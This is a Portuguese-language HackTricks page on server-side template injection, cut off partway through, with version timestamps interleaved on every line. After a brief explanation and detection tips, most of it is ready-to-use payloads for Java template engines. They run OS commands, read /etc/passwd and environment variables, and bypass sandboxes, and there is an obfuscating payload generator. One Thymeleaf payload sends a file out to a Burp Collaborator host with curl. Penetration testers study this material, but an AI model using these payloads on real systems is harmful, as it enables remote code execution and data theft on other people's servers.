2024-03-29 20:56:56 +00:00
# SSTI (Server Side Template Injection)
2023-08-29 18:57:50 +00:00
2022-04-28 16:01:33 +00:00
< details >
2024-03-29 20:56:56 +00:00
< summary > < strong > Aprenda hacking AWS do zero ao herói com< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2024-01-01 19:42:29 +00:00
2024-03-29 20:56:56 +00:00
Outras formas de apoiar o HackTricks:
2022-04-28 16:01:33 +00:00
2024-02-23 16:42:31 +00:00
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** , verifique os [**PLANOS DE ASSINATURA** ](https://github.com/sponsors/carlospolop )!
2024-03-29 20:56:56 +00:00
* Adquira o [**swag oficial PEASS & HackTricks** ](https://peass.creator-spring.com )
2024-02-05 02:45:11 +00:00
* Descubra [**A Família PEASS** ](https://opensea.io/collection/the-peass-family ), nossa coleção exclusiva de [**NFTs** ](https://opensea.io/collection/the-peass-family )
2024-02-23 16:42:31 +00:00
* **Junte-se ao** 💬 [**grupo Discord** ](https://discord.gg/hRep4RUj7f ) ou ao [**grupo telegram** ](https://t.me/peass ) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )**.**
2024-02-06 14:25:15 +00:00
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) e [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) repositórios do github.
2022-04-28 16:01:33 +00:00
< / details >
2023-06-25 23:26:46 +00:00
< figure > < img src = "../../.gitbook/assets/image (1) (3) (3).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-10-25 15:56:49 +00:00
2024-01-01 19:42:29 +00:00
[**RootedCON** ](https://www.rootedcon.com ) é o evento de cibersegurança mais relevante na **Espanha** e um dos mais importantes na **Europa** . Com **a missão de promover o conhecimento técnico** , este congresso é um ponto de encontro fervilhante para profissionais de tecnologia e cibersegurança em todas as disciplinas.
2022-10-25 15:56:49 +00:00
{% embed url="https://www.rootedcon.com/" %}
2024-03-29 20:56:56 +00:00
## O que é SSTI (Server-Side Template Injection)
2020-07-15 15:43:14 +00:00
2024-03-29 20:56:56 +00:00
A injeção de template do lado do servidor é uma vulnerabilidade que ocorre quando um atacante pode injetar código malicioso em um template que é executado no servidor. Essa vulnerabilidade pode ser encontrada em várias tecnologias, incluindo Jinja.
2020-07-15 15:43:14 +00:00
2024-03-29 20:56:56 +00:00
Jinja é um mecanismo de template popular usado em aplicações web. Vamos considerar um exemplo que demonstra um trecho de código vulnerável usando Jinja:
2024-04-06 19:38:49 +00:00
2024-02-06 14:25:15 +00:00
```python
output = template.render(name=request.args.get('name'))
2020-07-15 15:43:14 +00:00
```
2024-04-06 19:38:49 +00:00
2024-02-06 14:25:15 +00:00
Neste código vulnerável, o parâmetro `name` da requisição do usuário é diretamente passado para o template usando a função `render` . Isso pode potencialmente permitir que um atacante injete código malicioso no parâmetro `name` , levando a uma injeção de template no lado do servidor.
2020-07-15 15:43:14 +00:00
2024-02-06 14:25:15 +00:00
Por exemplo, um atacante poderia criar uma requisição com um payload como este:
2024-04-06 19:38:49 +00:00
2021-10-18 11:21:18 +00:00
```
2024-02-06 14:25:15 +00:00
http://vulnerable-website.com/?name={{bad-stuff-here}}
2020-07-15 15:43:14 +00:00
```
2024-04-06 19:38:49 +00:00
2024-02-06 14:25:15 +00:00
O payload `{{bad-stuff-here}}` é injetado no parâmetro `name` . Este payload pode conter diretivas de modelo Jinja que permitem ao atacante executar código não autorizado ou manipular o mecanismo de modelo, potencialmente obtendo controle sobre o servidor.
2024-01-01 19:42:29 +00:00
2024-03-29 20:56:56 +00:00
Para prevenir vulnerabilidades de injeção de modelo do lado do servidor, os desenvolvedores devem garantir que a entrada do usuário seja devidamente sanitizada e validada antes de ser inserida nos modelos. Implementar validação de entrada e usar técnicas de escape conscientes do contexto pode ajudar a mitigar o risco dessa vulnerabilidade.
2020-07-15 15:43:14 +00:00
2024-02-06 14:25:15 +00:00
### Detecção
2024-02-23 16:42:31 +00:00
2024-02-06 14:25:15 +00:00
Para detectar Injeção de Modelo do Lado do Servidor (SSTI), inicialmente, **fazer fuzzing no modelo** é uma abordagem direta. Isso envolve injetar uma sequência de caracteres especiais (**`${{< %[%'"}}%\`**) no modelo e analisar as diferenças na resposta do servidor para dados regulares versus essa carga especial. Indicadores de vulnerabilidade incluem:
2020-07-15 15:43:14 +00:00
2024-04-06 19:38:49 +00:00
* Erros lançados, revelando a vulnerabilidade e potencialmente o mecanismo de modelo.
* Ausência da carga na reflexão, ou partes dela faltando, implicando que o servidor a processa de forma diferente dos dados regulares.
* **Contexto de Texto Simples**: Distinguir de XSS verificando se o servidor avalia expressões de modelo (por exemplo, `{{7*7}}` , `${7*7}` ).
* **Contexto de Código**: Confirmar a vulnerabilidade alterando parâmetros de entrada. Por exemplo, alterar `greeting` em `http://vulnerable-website.com/?greeting=data.username` para ver se a saída do servidor é dinâmica ou fixa, como em `greeting=data.username}}hello` retornando o nome de usuário.
2020-07-15 15:43:14 +00:00
2024-02-06 14:25:15 +00:00
#### Fase de Identificação
2024-02-23 16:42:31 +00:00
2024-02-06 14:25:15 +00:00
Identificar o mecanismo de modelo envolve analisar mensagens de erro ou testar manualmente várias cargas específicas de linguagem. Cargas comuns que causam erros incluem `${7/0}` , `{{7/0}}` e `<%= 7/0 %>` . Observar a resposta do servidor a operações matemáticas ajuda a identificar o mecanismo de modelo específico.
2020-07-15 15:43:14 +00:00
2024-01-01 19:42:29 +00:00
## Ferramentas
2023-08-29 18:57:50 +00:00
2024-01-01 19:42:29 +00:00
### [TInjA](https://github.com/Hackmanit/TInjA)
2021-06-25 12:34:30 +00:00
2024-02-23 16:42:31 +00:00
um scanner eficiente de SSTI + CSTI que utiliza políglotos inovadores
2024-04-06 19:38:49 +00:00
2024-01-01 19:42:29 +00:00
```bash
tinja url -u "http://example.com/?name=Kirlia" -H "Authentication: Bearer ey..."
tinja url -u "http://example.com/" -d "username=Kirlia" -c "PHPSESSID=ABC123..."
```
2024-04-06 19:38:49 +00:00
2024-01-10 22:21:02 +00:00
### [SSTImap](https://github.com/vladko312/sstimap)
2024-04-06 19:38:49 +00:00
2024-01-10 22:21:02 +00:00
```bash
python3 sstimap.py -i -l 5
2024-03-26 07:58:54 +00:00
python3 sstimap.py -u "http://example.com/" --crawl 5 --forms
python3 sstimap.py -u "https://example.com/page?name=John" -s
2024-01-10 22:21:02 +00:00
```
2024-04-06 19:38:49 +00:00
2024-01-01 19:42:29 +00:00
### [Tplmap](https://github.com/epinna/tplmap)
2024-04-06 19:38:49 +00:00
2021-06-25 12:34:30 +00:00
```python
python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*& comment=supercomment& link"
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*& comment=A& link" --level 5 -e jade
```
2024-04-06 19:38:49 +00:00
2024-01-01 19:42:29 +00:00
### [Tabela de Injeção de Template](https://github.com/Hackmanit/template-injection-table)
2024-03-16 10:05:23 +00:00
uma tabela interativa contendo os poliglotas de injeção de template mais eficientes juntamente com as respostas esperadas dos 44 motores de template mais importantes.
2020-07-15 15:43:14 +00:00
2024-01-01 19:42:29 +00:00
## Exploits
2023-08-29 18:57:50 +00:00
2024-01-01 19:42:29 +00:00
### Genérico
2021-06-27 20:19:16 +00:00
2024-03-29 20:56:56 +00:00
Nesta **lista de palavras** , você pode encontrar **variáveis definidas** nos ambientes de alguns dos motores mencionados abaixo:
2021-06-27 20:19:16 +00:00
* [https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-special-vars.txt ](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-special-vars.txt )
2024-02-06 14:25:15 +00:00
* [https://github.com/danielmiessler/SecLists/blob/25d4ac447efb9e50b640649f1a09023e280e5c9c/Discovery/Web-Content/burp-parameter-names.txt ](https://github.com/danielmiessler/SecLists/blob/25d4ac447efb9e50b640649f1a09023e280e5c9c/Discovery/Web-Content/burp-parameter-names.txt )
2021-06-27 20:19:16 +00:00
2024-01-01 19:42:29 +00:00
### Java
2021-06-25 12:34:30 +00:00
2024-02-05 02:45:11 +00:00
**Java - Injeção Básica**
2024-04-06 19:38:49 +00:00
2021-06-25 12:34:30 +00:00
```java
${7*7}
${{7*7}}
${class.getClassLoader()}
${class.getResource("").getPath()}
${class.getResource("../../../../../index.htm").getContent()}
2024-02-06 14:25:15 +00:00
// if ${...} doesn't work try #{...}, *{...}, @{...} or ~{...}.
2021-06-25 12:34:30 +00:00
```
2024-04-06 19:38:49 +00:00
2024-02-05 02:45:11 +00:00
**Java - Obter as variáveis de ambiente do sistema**
2024-04-06 19:38:49 +00:00
2021-06-25 12:34:30 +00:00
```java
${T(java.lang.System).getenv()}
```
2024-04-06 19:38:49 +00:00
2024-02-05 02:45:11 +00:00
**Java - Obter /etc/passwd**
2024-04-06 19:38:49 +00:00
2021-06-25 12:34:30 +00:00
```java
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
```
2024-04-06 19:38:49 +00:00
2024-01-01 19:42:29 +00:00
### FreeMarker (Java)
2023-08-29 18:57:50 +00:00
2024-02-05 02:45:11 +00:00
Você pode tentar seus payloads em [https://try.freemarker.apache.org ](https://try.freemarker.apache.org )
2021-06-25 12:34:30 +00:00
2020-07-15 15:43:14 +00:00
* `{{7*7}} = {{7*7}}`
* `${7*7} = 49`
2024-02-05 02:45:11 +00:00
* `#{7*7} = 49 -- (legacy)`
* `${7*'7'} Nothing`
2020-07-15 15:43:14 +00:00
* `${foobar}`
2024-04-06 19:38:49 +00:00
2021-06-25 12:34:30 +00:00
```java
< #assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
${"freemarker.template.utility.Execute"?new()("id")}
2020-07-15 15:43:14 +00:00
${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/home/carlos/my_password.txt').toURL().openStream().readAllBytes()?join(" ")}
```
2024-04-06 19:38:49 +00:00
2023-06-06 18:56:34 +00:00
**Freemarker - Bypass de Sandbox**
2020-07-15 15:43:14 +00:00
2023-06-25 23:26:46 +00:00
⚠️ funciona apenas em versões do Freemarker abaixo de 2.3.30
2024-04-06 19:38:49 +00:00
2021-06-25 12:34:30 +00:00
```java
< #assign classloader=article.class.protectionDomain.classLoader>
< #assign owc=classloader.loadClass("freemarker.template.ObjectWrapper")>
< #assign dwf=owc.getField("DEFAULT_WRAPPER").get(null)>
< #assign ec=classloader.loadClass("freemarker.template.utility.Execute")>
${dwf.newInstance(ec,null)("id")}
```
2024-04-06 19:38:49 +00:00
2023-06-06 18:56:34 +00:00
**Mais informações**
2021-06-25 12:34:30 +00:00
2023-06-06 18:56:34 +00:00
* Na seção FreeMarker de [https://portswigger.net/research/server-side-template-injection ](https://portswigger.net/research/server-side-template-injection )
2021-10-18 11:21:18 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#freemarker ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#freemarker )
2020-07-15 15:43:14 +00:00
2024-01-01 19:42:29 +00:00
### Velocity (Java)
2024-04-06 19:38:49 +00:00
2021-06-25 12:34:30 +00:00
```java
2024-03-16 10:05:23 +00:00
// I think this doesn't work
2021-06-25 12:34:30 +00:00
#set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type)
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])
$str.valueOf($chr.toChars($out.read()))
#end
2024-03-16 10:05:23 +00:00
// This should work?
#set($s="")
#set($stringClass=$s.getClass())
#set($runtime=$stringClass.forName("java.lang.Runtime").getRuntime())
#set($process=$runtime.exec("cat%20/flag563378e453.txt"))
#set($out=$process.getInputStream())
#set($null=$process.waitFor() )
#foreach($i+in+[1..$out.available()])
$out.read()
#end
2021-06-25 12:34:30 +00:00
```
2024-04-06 19:38:49 +00:00
2023-06-06 18:56:34 +00:00
**Mais informações**
2021-06-25 12:34:30 +00:00
2023-06-06 18:56:34 +00:00
* Na seção Velocity de [https://portswigger.net/research/server-side-template-injection ](https://portswigger.net/research/server-side-template-injection )
2021-10-18 11:21:18 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#velocity ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#velocity )
2020-07-15 15:43:14 +00:00
2024-02-06 14:25:15 +00:00
### Thymeleaf
2020-07-15 15:43:14 +00:00
2024-03-29 20:56:56 +00:00
No Thymeleaf, um teste comum para vulnerabilidades de SSTI é a expressão `${7*7}` , que também se aplica a este mecanismo de modelo. Para possíveis execuções de código remoto, podem ser usadas expressões como as seguintes:
2024-02-23 16:42:31 +00:00
2024-04-06 19:38:49 +00:00
* SpringEL:
2020-07-15 15:43:14 +00:00
2024-02-06 14:25:15 +00:00
```java
${T(java.lang.Runtime).getRuntime().exec('calc')}
```
2024-04-06 19:38:49 +00:00
* OGNL:
2024-02-23 16:42:31 +00:00
2024-02-06 14:25:15 +00:00
```java
${#rt = @java .lang.Runtime@getRuntime(),#rt.exec("calc")}
```
2020-07-15 15:43:14 +00:00
2024-03-29 20:56:56 +00:00
Thymeleaf requer que essas expressões sejam colocadas dentro de atributos específicos. No entanto, o _inline de expressão_ é suportado para outras localizações de modelo, usando sintaxe como `[[...]]` ou `[(...)]` . Assim, um payload de teste SSTI simples pode se parecer com `[[${7*7}]]` .
2020-07-15 15:43:14 +00:00
2024-03-29 20:56:56 +00:00
No entanto, a probabilidade deste payload funcionar é geralmente baixa. A configuração padrão do Thymeleaf não suporta geração dinâmica de modelos; os modelos devem ser predefinidos. Os desenvolvedores precisariam implementar seu próprio `TemplateResolver` para criar modelos a partir de strings dinamicamente, o que é incomum.
2023-08-29 18:57:50 +00:00
2024-03-26 07:58:54 +00:00
Thymeleaf também oferece _pré-processamento de expressão_ , onde expressões dentro de dois sublinhados duplos (`__...__`) são pré-processadas. Este recurso pode ser utilizado na construção de expressões, como demonstrado na documentação do Thymeleaf:
2024-04-06 19:38:49 +00:00
2021-06-25 12:34:30 +00:00
```java
2020-07-15 15:43:14 +00:00
#{selection.__${sel.code}__}
```
2024-04-06 19:38:49 +00:00
2024-02-06 14:25:15 +00:00
**Exemplo de Vulnerabilidade no Thymeleaf**
Considere o trecho de código a seguir, que poderia ser suscetível à exploração:
2024-04-06 19:38:49 +00:00
2024-02-06 14:25:15 +00:00
```xml
2020-07-15 15:43:14 +00:00
< a th:href = "@{__${path}__}" th:title = "${title}" >
2022-05-18 13:29:23 +00:00
< a th:href = "${''.getClass().forName('java.lang.Runtime').getRuntime().exec('curl -d @/flag .txt burpcollab.com')}" th:title = 'pepito' >
2024-02-06 14:25:15 +00:00
```
2024-04-06 19:38:49 +00:00
2024-02-06 14:25:15 +00:00
Isso indica que se o mecanismo de template processar essas entradas de forma inadequada, pode levar à execução de código remoto acessando URLs como:
2024-04-06 19:38:49 +00:00
2024-02-06 14:25:15 +00:00
```
2020-07-15 15:43:14 +00:00
http://localhost:8082/(7*7)
http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})
```
2024-04-06 19:38:49 +00:00
2023-06-06 18:56:34 +00:00
**Mais informações**
2020-07-15 15:43:14 +00:00
* [https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/ ](https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/ )
2022-05-18 13:29:23 +00:00
{% content-ref url="el-expression-language.md" %}
[el-expression-language.md ](el-expression-language.md )
{% endcontent-ref %}
2024-01-01 19:42:29 +00:00
### Spring Framework (Java)
2024-04-06 19:38:49 +00:00
2022-09-26 02:13:30 +00:00
```java
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}
```
2024-04-06 19:38:49 +00:00
2024-02-05 02:45:11 +00:00
**Burlar filtros**
2023-08-29 18:57:50 +00:00
2024-02-05 02:45:11 +00:00
Múltiplas expressões de variáveis podem ser usadas, se `${...}` não funcionar, tente `#{...}` , `*{...}` , `@{...}` ou `~{...}` .
2023-01-13 17:40:30 +00:00
2023-06-06 18:56:34 +00:00
* Ler `/etc/passwd`
2024-04-06 19:38:49 +00:00
2022-12-30 16:36:06 +00:00
```java
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
```
2024-04-06 19:38:49 +00:00
2024-02-05 02:45:11 +00:00
* Script personalizado para geração de payload
2024-04-06 19:38:49 +00:00
2022-12-30 16:36:06 +00:00
```python
#!/usr/bin/python3
## Written By Zeyad Abulaban (zAbuQasem)
# Usage: python3 gen.py "id"
from sys import argv
cmd = list(argv[1].strip())
print("Payload: ", cmd , end="\n\n")
converted = [ord(c) for c in cmd]
base_payload = '*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec'
2023-06-25 23:26:46 +00:00
end_payload = '.getInputStream())}'
2022-12-30 16:36:06 +00:00
count = 1
for i in converted:
2023-06-25 23:26:46 +00:00
if count == 1:
base_payload += f"(T(java.lang.Character).toString({i}).concat"
count += 1
elif count == len(converted):
base_payload += f"(T(java.lang.Character).toString({i})))"
else:
base_payload += f"(T(java.lang.Character).toString({i})).concat"
count += 1
2022-12-30 16:36:06 +00:00
print(base_payload + end_payload)
```
2024-04-06 19:38:49 +00:00
2023-06-06 18:56:34 +00:00
**Mais Informações**
2023-01-13 17:40:30 +00:00
* [Thymleaf SSTI ](https://javamana.com/2021/11/20211121071046977B.html )
* [Payloads all the things ](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#java---retrieve-etcpasswd )
2024-01-01 19:42:29 +00:00
### Manipulação de Visualização Spring (Java)
2024-04-06 19:38:49 +00:00
2021-06-25 12:34:30 +00:00
```java
__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x
__${T(java.lang.Runtime).getRuntime().exec("touch executed")}__::.x
```
2024-04-06 19:38:49 +00:00
2022-05-18 13:29:23 +00:00
* [https://github.com/veracode-research/spring-view-manipulation ](https://github.com/veracode-research/spring-view-manipulation )
{% content-ref url="el-expression-language.md" %}
[el-expression-language.md ](el-expression-language.md )
{% endcontent-ref %}
2020-09-22 09:07:48 +00:00
2024-01-01 19:42:29 +00:00
### Pebble (Java)
2021-06-25 12:34:30 +00:00
* `{{ someString.toUPPERCASE() }}`
2024-01-10 22:21:02 +00:00
Versão antiga do Pebble ( < versão 3 . 0 . 9 ) :
2024-04-06 19:38:49 +00:00
2021-06-25 12:34:30 +00:00
```java
{{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }}
```
2024-04-06 19:38:49 +00:00
2023-06-06 18:56:34 +00:00
Nova versão do Pebble:
2024-04-06 19:38:49 +00:00
2021-06-25 12:34:30 +00:00
```java
2022-02-09 16:22:44 +00:00
{% raw %}
2021-06-25 12:34:30 +00:00
{% set cmd = 'id' %}
2022-02-09 16:22:44 +00:00
{% endraw %}
2023-04-05 23:11:20 +00:00
2023-04-30 21:23:47 +00:00
2024-02-23 16:42:31 +00:00
2024-03-29 20:56:56 +00:00
2024-04-06 19:38:49 +00:00
2021-06-25 12:34:30 +00:00
{% set bytes = (1).TYPE
2023-06-25 23:26:46 +00:00
.forName('java.lang.Runtime')
.methods[6]
.invoke(null,null)
.exec(cmd)
.inputStream
.readAllBytes() %}
2021-06-25 12:34:30 +00:00
{{ (1).TYPE
2023-06-25 23:26:46 +00:00
.forName('java.lang.String')
.constructors[0]
.newInstance(([bytes]).toArray()) }}
2021-06-25 12:34:30 +00:00
```
2024-04-06 19:38:49 +00:00
2024-01-01 19:42:29 +00:00
### Jinjava (Java)
2024-02-09 02:10:17 +00:00
2024-03-29 20:56:56 +00:00
Jinjava é uma biblioteca Java para análise e renderização de modelos de texto. Ele suporta a injeção de código no lado do servidor (SSTI) e é comumente usado em aplicativos da web Java para processar modelos dinâmicos. Jinjava pode ser vulnerável a ataques de injeção de código se não for configurado corretamente. Certifique-se de validar e sanitizar todas as entradas do usuário ao usar Jinjava para evitar vulnerabilidades de SSTI.
2024-04-06 19:38:49 +00:00
2021-06-25 12:34:30 +00:00
```java
{{'a'.toUpperCase()}} would result in 'A'
{{ request }} would return a request object like com.[...].context.TemplateContextRequest@23548206
```
2024-04-06 19:38:49 +00:00
2024-02-23 16:42:31 +00:00
Jinjava é um projeto de código aberto desenvolvido pela Hubspot, disponível em [https://github.com/HubSpot/jinjava/ ](https://github.com/HubSpot/jinjava/ )
2024-02-05 02:45:11 +00:00
**Jinjava - Execução de Comandos**
2021-06-25 12:34:30 +00:00
2023-06-06 18:56:34 +00:00
Corrigido por [https://github.com/HubSpot/jinjava/pull/230 ](https://github.com/HubSpot/jinjava/pull/230 )
2024-04-06 19:38:49 +00:00
2021-06-25 12:34:30 +00:00
```java
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
```
2024-04-06 19:38:49 +00:00
2023-06-06 18:56:34 +00:00
**Mais informações**
2021-06-25 12:34:30 +00:00
2021-10-18 11:21:18 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinjava ](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinjava )
2021-06-25 12:34:30 +00:00
2024-01-01 19:42:29 +00:00
### Hubspot - HuBL (Java)
2021-06-26 13:19:42 +00:00
2024-02-05 02:45:11 +00:00
* Delimitadores de declaração `{% %}`
* Delimitadores de expressão `{{ }}`
* Delimitadores de comentário `{# #}`
2022-04-06 08:57:29 +00:00
* `{{ request }}` - com.hubspot.content.hubl.context.TemplateContextRequest@23548206
2021-06-26 13:19:42 +00:00
* `{{'a'.toUpperCase()}}` - "A"
* `{{'a'.concat('b')}}` - "ab"
* `{{'a'.getClass()}}` - java.lang.String
* `{{request.getClass()}}` - class com.hubspot.content.hubl.context.TemplateContextRequest
2022-04-06 08:57:29 +00:00
* `{{request.getClass().getDeclaredMethods()[0]}}` - public boolean com.hubspot.content.hubl.context.TemplateContextRequest.isDebug()
2021-06-26 13:19:42 +00:00
2024-02-05 02:45:11 +00:00
Pesquise por "com.hubspot.content.hubl.context.TemplateContextRequest" e descubra o [projeto Jinjava no Github ](https://github.com/HubSpot/jinjava/ ).
2024-04-06 19:38:49 +00:00
2021-06-26 13:19:42 +00:00
```java
{{request.isDebug()}}
//output: False
//Using string 'a' to get an instance of class sun.misc.Launcher
{{'a'.getClass().forName('sun.misc.Launcher').newInstance()}}
//output: sun.misc.Launcher@715537d4
//It is also possible to get a new object of the Jinjava class
{{'a'.getClass().forName('com.hubspot.jinjava.JinjavaConfig').newInstance()}}
//output: com.hubspot.jinjava.JinjavaConfig@78a56797
2023-06-25 23:26:46 +00:00
//It was also possible to call methods on the created object by combining the
2022-04-06 16:21:07 +00:00
2022-04-28 15:47:13 +00:00
2022-04-28 23:27:22 +00:00
2022-04-06 08:57:29 +00:00
{% raw %}
2022-02-09 16:22:44 +00:00
{% %} and {{ }} blocks
{% set ji='a'.getClass().forName('com.hubspot.jinjava.Jinjava').newInstance().newInterpreter() %}
2022-04-06 08:57:29 +00:00
{% endraw %}
{{ji.render('{{1*2}}')}}
2021-06-26 13:19:42 +00:00
//Here, I created a variable 'ji' with new instance of com.hubspot.jinjava.Jinjava class and obtained reference to the newInterpreter method. In the next block, I called the render method on 'ji' with expression {{1*2}}.
//{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
//output: xxx
//RCE
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
//output: java.lang.UNIXProcess@1e5f456e
//RCE with org.apache.commons.io.IOUtils.
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
//output: netstat execution
//Multiple arguments to the commands
Payload: {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
2022-04-06 08:57:29 +00:00
//Output: Linux bumpy-puma 4.9.62-hs4.el6.x86_64 #1 SMP Fri Jun 1 03:00:47 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
2021-06-26 13:19:42 +00:00
```
2024-04-06 19:38:49 +00:00
2023-06-06 18:56:34 +00:00
**Mais informações**
2021-06-26 13:19:42 +00:00
* [https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html ](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html )
2024-02-05 02:45:11 +00:00
### Linguagem de Expressão - EL (Java)
2021-06-07 09:30:58 +00:00
2021-06-26 13:24:50 +00:00
* `${"aaaa"}` - "aaaa"
2022-04-05 22:24:52 +00:00
* `${99999+1}` - 100000.
2021-06-26 13:24:50 +00:00
* `#{7*7}` - 49
2021-06-26 14:55:22 +00:00
* `${{7*7}}` - 49
* `${{request}}, ${{session}}, {{faceContext}}`
2021-06-26 13:24:50 +00:00
2024-03-29 20:56:56 +00:00
A Linguagem de Expressão (EL) é um recurso fundamental que facilita a interação entre a camada de apresentação (como páginas da web) e a lógica da aplicação (como beans gerenciados) em JavaEE. É amplamente utilizada em várias tecnologias JavaEE para otimizar essa comunicação. As principais tecnologias JavaEE que utilizam EL incluem:
2024-02-06 14:25:15 +00:00
2024-02-23 16:42:31 +00:00
* **JavaServer Faces (JSF)**: Emprega EL para vincular componentes em páginas JSF aos dados e ações de backend correspondentes.
* **JavaServer Pages (JSP)**: EL é usado em JSP para acessar e manipular dados dentro das páginas JSP, facilitando a conexão dos elementos da página aos dados da aplicação.
2024-03-29 20:56:56 +00:00
* **Contexts and Dependency Injection for Java EE (CDI)**: EL integra-se ao CDI para permitir a interação perfeita entre a camada web e os beans gerenciados, garantindo uma estrutura de aplicação mais coerente.
2024-02-06 14:25:15 +00:00
Confira a seguinte página para aprender mais sobre a **exploração dos interpretadores EL** :
2021-06-07 09:30:58 +00:00
2021-10-18 11:21:18 +00:00
{% content-ref url="el-expression-language.md" %}
[el-expression-language.md ](el-expression-language.md )
{% endcontent-ref %}
2021-06-07 09:30:58 +00:00
2024-01-01 19:42:29 +00:00
### Groovy (Java)
2023-08-29 18:57:50 +00:00
2024-02-06 14:25:15 +00:00
Os seguintes desvios do Security Manager foram retirados deste [**artigo** ](https://security.humanativaspa.it/groovy-template-engine-exploitation-notes-from-a-real-case-scenario/ ).
2024-04-06 19:38:49 +00:00
2022-09-26 09:52:47 +00:00
```java
//Basic Payload
import groovy.*;
@groovy .transform.ASTTest(value={
2023-06-25 23:26:46 +00:00
cmd = "ping cq6qwx76mos92gp9eo7746dmgdm5au.burpcollaborator.net "
assert java.lang.Runtime.getRuntime().exec(cmd.split(" "))
2022-09-26 09:52:47 +00:00
})
def x
//Payload to get output
import groovy.*;
